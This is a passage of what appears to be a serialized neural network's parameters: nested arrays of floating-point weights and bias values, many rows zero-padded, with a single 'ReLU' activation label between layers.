0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -1.479, 1.287, -0.939, 0.2625, 1.606, -0.2207, 2.13, 1.363, -0.03293, 0.7144, 1.3955, 0.227, -0.3215, -0.04184, 2.934, 1.696, 0.7456, 0.5273, 0.0361, 0.2263, -0.02483, 1.376, 0.7593, 0.1683, 0.11597, 1.18, -0.6533, 0.03253, -0.0497, -1.375, 0.577, -0.08325, -0.965, 1.265, 1.952, -0.04312, 1.166, -2.346, 0.5215, 1.69, -1.17, 0.0451, -0.3057, -0.1842, -0.2932, -0.0366, 0.02156, 1.562, -2.068, -0.9287], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3186, 0.405, -0.3447, 0.3442, -0.7017, 0.567, 0.04663, 0.2454, 0.0451, -0.8647, -0.3877, 0.7686, -0.5127, 0.01024, -0.00902, -0.6436, 0.4988, 0.03998, 0.006855, 0.281, -0.02815, 0.6514, 0.8813, -0.343, 0.003075, 0.3047, -0.4824, 0.0761, 0.984, 0.11566, 0.2595, 0.1757, 0.3894, -1.428, -2.084, -0.04752, 0.1794, 0.10364, 0.2825, -0.8613, 0.02226, -0.01575, -0.6055, 0.04062, -0.05667, -0.01817, -0.00612, 0.02496, -0.0539, 0.882], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.38, -0.3486, -0.702, -0.2385, -0.2174, -0.05966, 0.2795, 0.06137, -0.03308, 0.418, -0.0896, -0.7847, 0.1958, -0.02502, 0.2228, 0.2964, -0.03928, 0.4976, 0.04425, 0.02942, -0.01814, 0.973, -0.1631, 0.0766, 0.1704, 0.4192, -0.32, 0.4204, 0.6543, 0.1968, 0.3784, -0.19, -0.457, 0.01619, -0.2272, 0.02408, 0.1625, 0.1573, -0.0017605, 0.2676, 0.3647, 5.76e-05, 0.1602, 0.10486, -0.2805, -0.01227, -0.00936, -0.013695, -0.11633, 0.3372], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.04758, -0.705, 0.232, 0.541, 0.4585, -0.78, -3.455, -1.349, 0.03546, -1.455, 0.1404, 0.871, -0.7935, -0.02138, 0.4211, 0.3123, -0.00966, 0.636, -0.02454, 0.5415, -0.03168, 1.521, -1.079, -0.02118, -0.001586, -0.771, 0.9, -0.678, -0.2563, -0.1361, 1.923, 0.2712, -0.02353, 0.785, 1.777, -0.02133, -1.292, 0.8174, -1.845, 0.863, 0.582, 0.02676, 0.2233, -0.04706, 1.43, -0.02576, -0.0344, 0.711, 0.9946, -0.1313], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.3247, -0.2216, -0.4062, 0.10516, -0.1255, 0.1559, -0.2247, -0.07446, -0.04007, 0.3274, 0.09357, 0.1826, 0.12317, -0.01368, -0.005547, 0.793, 0.2715, -0.004883, -0.00786, -0.01538, 0.04163, 0.0902, 0.06287, 0.4053, 0.1268, 0.07, 0.2164, 0.2322, -0.0367, -0.1544, 0.3018, -0.558, 0.3123, -0.11017, -0.4382, -0.0028, 0.05585, -0.002409, -0.7144, 0.327, 0.05536, -0.01076, -0.5806, 0.3367, -0.763, -0.03152, 0.015175, 0.706, -0.10516, -0.149], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.2332, 0.598, 0.953, -0.0632, 0.149, 0.3171, 1.06, 0.1307, -0.02621, 0.9707, -0.5874, 0.2347, -1.939, 0.02888, 0.4775, 0.00294, -0.596, -0.641, -0.00851, -6.703, 0.04166, 0.8394, 0.7314, -0.1284, 0.1092, 0.002285, -0.12335, -0.3472, -0.0558, -0.1389, -0.6724, -0.4521, -0.1918, 0.757, -0.689, -0.00482, 0.5156, 0.9585, 0.403, -4.324, -0.6543, -0.03195, 0.1194, 0.5664, 1.279, -0.01119, -0.017, -0.8687, -0.707, 0.252], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.1554, -0.191, 0.3003, -0.696, -0.04227, -1.078, -1.011, -0.3608, 0.02322, -0.0765, 0.4807, -0.5176, 0.12415, 0.00877, -0.2744, 0.53, -0.06323, 0.187, -0.04102, -0.2279, 0.03833, 0.4546, -2.207, 0.084, 0.03125, -0.1729, -0.03146, -0.3608, -0.07385, 0.2988, 0.4338, 0.03674, 0.02396, 0.933, -0.7964, -0.02739, 0.3147, 0.0851, -0.296, 0.4512, -0.528, -0.04825, -0.196, -0.3782, -0.12195, 0.00296, -0.03876, -3.059, -0.3726, -0.656], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.4617, 0.1313, -0.04257, 0.3748, -0.915, 0.3792, 0.003689, -0.1026, -0.04608, -0.2427, -0.1345, -0.1365, -0.001418, 0.01813, -0.09973, -0.4058, -0.7007, 0.991, 0.01636, 0.0455, 0.01433, 0.3445, -0.1099, -0.269, -0.0254, -0.3972, -1.223, 0.645, 0.03726, 0.2546, 0.0426, 0.12103, 0.923, -0.246, -0.2908, -0.02563, -0.1486, 0.0317, 0.3628, 0.1635, -1.365, 0.005154, -0.1362, 0.1024, 0.318, -0.004833, 0.03516, 1.308, -0.531, 0.3696], [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.381, -0.07916, -0.049, -1.064, -0.1185, 0.0564, 0.9263, 0.3987, 0.005604, 0.2825, -0.1055, -0.2466, 0.694, 0.02861, -0.3599, -0.2375, 0.0874, -1.106, -0.01839, 0.00826, -0.00414, -0.0523, 0.544, 0.01842, 0.1202, -0.9106, 0.452, 0.1882, 0.4148, -0.1584, 0.2401, 0.1523, -0.007343, -0.2515, 0.1581, 0.03336, -0.0916, 0.3875, -0.408, 0.1293, 0.056, -0.02574, -0.343, 0.0711, 0.556, 0.01458, -0.002916, 1.654, 0.4243, -0.041]]
[0.333445, 0.32937, 0.404653, -0.921284, -0.329964, -1.82794, -0.0609542, -2.62039, 1.29905, 0.430929, -1.13653, 0.0242726, 0.139059, -2.15069, 0.465926, -1.02814, 0.384972, -1.55804, -0.0424164, -0.0173877, 0.688755, 0.45788, -0.544515, 0.103801, -0.00967208, -0.162685, -0.365785, -1.04445, 2.10269, -3.82108, -4.04447, -0.478207, -1.29071, 0.633645, -1.25998, 0.988992, -2.70079, -0.0321225, 0.197998, 0.671656, -0.0602532, -1.59659, -1.40148, -3.17843, -1.25713, 0.477901, -1.81706, 1.09953, -1.11851, -1.21469, 0.3335, 0.3293, 0.4045, -0.9214, -0.33, -1.828, -0.06094, -2.621, 1.299, 0.431, -1.137, 0.02428, 0.139, -2.15, 0.4658, -1.028, 0.385, -1.558, -0.04242, -0.0174, 0.689, 0.4578, -0.5444, 0.1038, -0.009674, -0.1627, -0.3657, -1.045, 2.104, -3.82, -4.043, -0.4783, -1.291, 0.634, -1.26, 0.989, -2.701, -0.03214, 0.198, 0.672, -0.06024, -1.597, -1.401, -3.178, -1.257, 0.4778, -1.817, 1.1, -1.118, -1.215]
ReLU
[[0.167685, 1.09312, 0.263226, -0.291381, 0.292082, -0.392743, 0.00552508, -0.248047, -0.0521225, 0.18915, 0.111934, 0.518227, 0.322147, -0.96541, 0.377765, -0.0485448, -0.36135, -0.29723, -0.40272, 0.0130533, 0.0586307, -0.147412, 0.278238, -0.0355259, 0.0374484, -0.176304, 0.665298, 0.45922, 0.151066, -0.142154, -0.314712, 0.164128, 0.389949, -0.544097, 0.221669, -0.476801, -0.310391, -0.00354713, 0.292965, 0.266164, 0.269099, -0.132948, 0.255949, 0.0800786, -0.0571545, -0.109944, 0.02507, 0.307336, 0.0293063, -0.110315, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.00369, 1.68887, -1.08955, -0.778672, -0.629387, 1.9431, 0.255514, -1.9942, -0.345986, 0.0854198, -2.63058, -0.022469, -0.790494, 1.71589, -0.313338, -0.558032, -0.0272906, -1.2291, -0.579189, 0.0166798, 0.456241, -1.25326, 0.221219, -1.20995, 0.0100253, -0.407857, 0.501173, -1.3935, 0.228023, -0.248732, 0.579598, 0.119808, -0.366925, 2.39497, 0.00252787, -0.488271, 0.348579, 0.0255068, 0.0342514, -0.712904, 0.0341286, 0.954069, 0.454144, -2.34672, 0.0899126, -1.3592, 1.06547, -0.478468, 0.469432, 0.146536, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.354638, -1.34062, -0.807383, -0.246766, 0.142697, 0.898577, 0.230978, 1.06982, -0.336711, 0.100806, -0.131796, 0.145726, -0.216204, 1.12131, -0.187531, 1.5723, -0.398188, 0.0185012, -0.0134581, -0.0217067, 0.0187364, -0.29955, 0.700615, 0.173631, 0.0207026, 0.445432, -0.101872, 0.0309654, 0.294081, 0.694449, -5.81642, -0.34403, 0.512093, 0.602536, 0.0326351, 0.189347, 0.230058, 0.0355673, 0.471882, -1.48714, -0.334473, -0.107627, 0.611081, -0.596013, -0.157325, 0.295609, -0.499445, -0.437181, -0.505419, 0.204727, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0981276, -4.01439, -4.01538, -1.02508, -2.7233, -3.4323, 0.164194, -2.83809, 1.18166, -2.97802, 1.49151, 0.945445, 0.0895877, 4.21248, 2.73609, 2.67625, 0.116389, -16.0378, -5.00794, 0.02148, -3.16851, 1.45503, -1.77117, -0.0307524, -0.0171075, 2.39026, 0.824409, 0.462742, -0.0203804, 1.52375, 1.41864, 1.31546, -0.937996, -5.23866, -2.3218, -0.563002, -3.25672, 0.0116683, -1.81782, -4.3764, -0.217214, -2.11835, -0.724478, 1.58288, -1.08776, 0.496041, 0.000333585, -2.67825, -1.59684, -1.53941, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.84655, 1.04445, 0.331494, 0.122932, 0.356896, -1.09766, -0.250201, -2.36606, 0.531876, 0.564043, -0.328188, -2.58002, 0.0218032, -2.2834, -0.248272, -1.02054, -0.46134, -1.31346, 1.25163, 0.00432597, -2.95697, 0.0993462, 0.818256, 2.8463, -0.0308824, 0.823178, -0.368611, -0.356445, 0.153112, 0.42696, -2.16425, -0.702152, 0.942929, 0.0133915, 0.33344, 0.526648, -2.26047, -0.00733395, -0.045398, 0.903595, 0.76068, -2.37762, 0.0191048, -0.742516, 1.05012, 0.523544, -0.233704, 0.0789711, 0.498782, 0.390608, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0204798, -0.516258, 0.580426, -0.108775, -0.0294453, -0.251101, -0.167089, -0.0297591, -0.293359, 0.0527287, 0.866282, 0.0471339, 0.373864, 0.0208759, -0.0056036, 0.262636, 0.0640093, -0.423169, 0.385045, 0.0185105, 0.268186, -0.135697, 0.0252595, -1.25734, -0.019402, -0.128896, 0.0714083, -0.0362569, -0.34226, -0.120863, -0.0253089, -0.381278, -0.053257, -0.291509, -0.618798, -0.216494, 0.752017, -0.00675978, -0.0835836, -0.175387, 0.202985, 0.0449615, 0.273019, -0.470096, -0.0598387, -0.00350449, -0.378555, -0.0491878, -0.910035, 0.0330585, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.246494, -0.000712129, 0.0311602, -0.381929, -0.200827, 0.0647095, 0.0434844, -0.263725, 0.0954817, -0.234808, -0.0848622, -0.206117, -0.269341, 0.573041, -0.043864, -0.112981, 0.0443333, -0.214051, 0.295684, 0.0465505, -0.020674, 0.0715898, -0.447092, -0.404371, 0.00690022, -0.11659, -0.406543, -0.257944, 0.0496564, -0.0137848, -0.154977, 0.0160314, -0.0787003, -0.308137, 0.227456, -0.00757121, 0.469689, -0.0470054, 0.237178, 0.0135662, -0.0856858, 0.0461834, 0.00550563, -0.960021, -0.112776, -0.150467, 0.170966, 0.192314, 0.0573785, 0.229288, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.197047, -0.153518, -0.0125794, -0.0477833, 0.068972, -0.0474614, 0.117495, 0.0128875, -0.121847, 0.0536297, 0.241619, -0.187346, -0.183347, -1.04566, -0.0708938, 0.300397, -0.0204781, -0.0518666, -0.0714642, 0.0453141, 0.423594, -0.132504, -0.375948, 0.355978, -0.0273414, 0.719783, -0.501527, 0.0861686, -0.0420574, -0.502339, 0.121336, -0.0316211, -0.234608, -0.425709, 0.137717, 0.236188, 1.22884, 0.00181691, -0.0362268, 0.23434, -0.211885, -0.143254, -0.110342, -0.881346, -0.163879, -0.565291, 0.0718393, -0.101421, 0.376246, 0.0830339, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.00789598, -0.733053, -0.0226453, 0.231737, -0.141265, 0.0827826, -0.0620344, 0.282346, 0.149078, -0.206358, 0.500899, -0.0344642, 0.154917, -0.232088, -0.607455, -0.146452, 0.321749, 0.440264, 0.217506, 0.0233071, 0.013215, -0.0340886, 0.59118, -0.268297, 0.0388567, 0.397463, -0.0250594, 0.151654, -0.215142, -0.177156, 0.015005, -0.476068, 0.0182334, 0.357134, 0.674414, -0.276294, -0.492011, -0.0369433, -0.153583, 0.111304, -0.135871, 0.303676, -0.00405505, -0.724108, -0.432811, 0.123632, -0.427753, -0.430669, 0.659992, 0.0148979, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0693761, -0.357176, -0.0797415, -0.158676, 0.14204, -0.0298882, -0.134102, 0.0268948, 0.0206018, -0.185926, -0.0913609, -0.189079, -0.107012, -0.0167323, 0.0714308, 0.0257175, 0.415612, 0.0166517, 0.349325, -0.0412902, 0.039886, 0.270389, -0.356209, 0.529296, 0.0333852, 0.106838, -0.0594988, -0.098233, -0.0584703, 0.163792, 0.0996626, -0.00914302, -0.24469, 0.156691, -0.203041, 0.119181, 0.498139, -0.014994, -0.690911, 0.116277, -0.00196221, 0.162171, -0.0892487, -0.442492, 0.015582, 0.315682, -0.231491, -0.149798, -0.0892529, 0.101254, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-1.22339, -2.68839, -0.519203, -2.80462, -0.993014, -0.265297, 1.09026, -0.690013, 0.685364, -0.849288, -0.16381, -0.393215, 0.101596, 1.02038, -1.6852, 1.01947, -0.787809, -0.760237, -0.583119, -0.0143117, -1.24684, -0.40955, 1.3075, -2.42916, 0.020885, -0.398329, -0.641953, 0.0294926, -0.497639, -0.761427, -5.00074, 0.782252, 0.436154, 3.04533, -0.945523, 0.449528, 0.437962, -0.0103452, -0.391202, -1.79425, 0.280312, -0.0393485, 0.298487, -0.748474, 0.0558249, 0.253805, -0.301093, 0.609325, -0.271364, -0.223507, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-4.20876, -0.684176, -0.230743, -2.09924, -0.499029, -3.61524, 1.27089, -2.33781, -1.82012, 0.933621, -1.44955, -2.21276, 0.654091, 0.418064, -0.0253053, 2.97778, -0.372129, -0.645141, -3.74514, 0.0177461, -0.610389, -0.0563614, -0.989688, -4.31225, -0.0294937, -4.78708, -4.96542, 0.842135, -0.181514, -3.037, 3.05432, 2.17497, -4.63017, -10.4285, -3.57919, -2.25759, -1.03419, -0.0377308, -2.56582, 2.29424, 0.197125, -1.52575, -1.7303, 4.94213, -1.82644, -2.73157, -2.25971, -2.40859, -1.11505, -1.18792, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.249918, -1.08656, 0.378923, -0.562593, -0.312066, -0.576311, 0.209155, 0.00244219, 0.151212, 0.407298, -0.243347, -0.749584, -0.425578, 0.308535, -0.652123, 0.458826, 0.330694, -0.723906, -0.422123, -0.0426845, -0.135116, 0.876757, -0.194927, -0.581791, 0.0424122, -0.950447, -0.189755, -0.768671, -0.269587, -0.0754568, -0.0472668, -0.166764, -0.231022, 0.351272, 0.259054, -0.249117, -1.07043, -0.0023421, -0.598998, -1.08198, -0.671076, -1.53022, -0.341578, 2.37524, -0.0966744, 0.262587, 0.752239, -0.237116, -0.542827, 0.116894, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.00674895, -0.229818, -0.0175839, -0.118731, -0.234244, 0.247569, 0.260095, -2.3345, -0.0428092, -0.0685099, -0.214427, -0.0378763, -0.167792, 0.881419, 0.165781, 0.455659, 0.146957, 0.0363949, 0.433309, -0.0077839, -0.14684, 0.327915, -0.331645, 0.534779, -0.0142563, 0.110407, -0.115908, -0.42786, 0.0246931, -0.129287, -1.01882, 0.089287, 0.147827, -0.616439, 0.350328, -0.177992, -0.360015, -0.0143435, 0.144361, -0.451281, -0.431582, 0.285917, -0.220778, 1.60373, -0.344523, 0.00541664, 0.708998, 0.270904, 0.100541, 0.034953, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.0923266, -0.407141, 0.197057, -0.013595, -0.529981, -0.600275, -0.120842, 0.517599, 0.139303, -0.430106, -0.454278, -0.641343, -0.662316, -0.0449787, -0.359693, 0.157745, 0.379568, -0.804902, 0.248097, -0.00230057, 0.433656, 0.170866, -0.985269, 0.195199, 0.0298499, -0.616322, -1.61455, -0.0156536, 0.429284, -0.139885, -0.732858, 0.252735, 0.403873, -0.838733, -0.722162, -0.120302, 0.427829, 0.0128434, 0.126833, -0.663246, 0.0320008, -1.02516, -0.214866, -4.712, -0.0424203, -0.300358, 0.460771, 0.402292, -0.522261, 0.0307216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [0.513153, 1.87674, -0.702909, 0.129678, 0.638881, -5.28947, 0.0825905, -0.703459, -0.263171, -0.915148, -0.565958, -2.10075, -0.473493, 0.458121, 0.453908, 0.310553, -0.134655, -0.163983, 1.15887, 0.0393557, 0.106839, 0.0502907, -0.379662, -0.33524, -0.0159504, 0.196638, 0.378166, -0.918053, 0.685114, -5.58875, 3.46345, -0.153757, -0.921351, -0.246955, -0.813223, -0.423792, 0.169263, -0.021993, -2.17247, -0.283349, -0.120304, 0.0748003, -0.182503, 2.1628, -3.92516, -0.0765661, -3.94864, -0.651897, -0.0854622, -0.464569, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.214345, -0.382141, 0.37634, -3.68023, -0.358103, -1.32936, -0.535625, 2.04446, 0.695121, -0.950536, -0.225231, 0.6603, -0.511383, 1.51744, -0.112634, -0.715296, 0.282385, -0.428883, 1.18484, 0.0442013, 0.0367636, 0.660615, -0.34991, -0.812445, -0.0300554, 0.159718, -1.04101, 0.887628, 0.214568, -0.886221, -0.730467, -0.0765574, 0.18412, 0.562534, -2.24851, 0.112305, 1.11096, -0.02627, -0.0189851, -0.874775, -0.360283, -0.864944, -0.279414, 0.325281, -3.38665, 0.000313881, 0.375667, -0.121193, -3.2523, 0.449419, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0], [-0.0620325, -0.126943, 0.0133273, 0.615185, -0.508363, -0.232423, -0.0898317, -2.74409, -0.214322, -0.755572, 0.0282837, -0.47995, 0.107215, -0.563832, -0.161452, 0.016788, 0.338216, 0.957305, 0.565462, 0.0469783, 0.136064, 0.115123, -0.574386, -1.6869, 0.0277409, 0.408205, -0.512209, -0.12695, -0.162937, -0.67685, -0.123005, 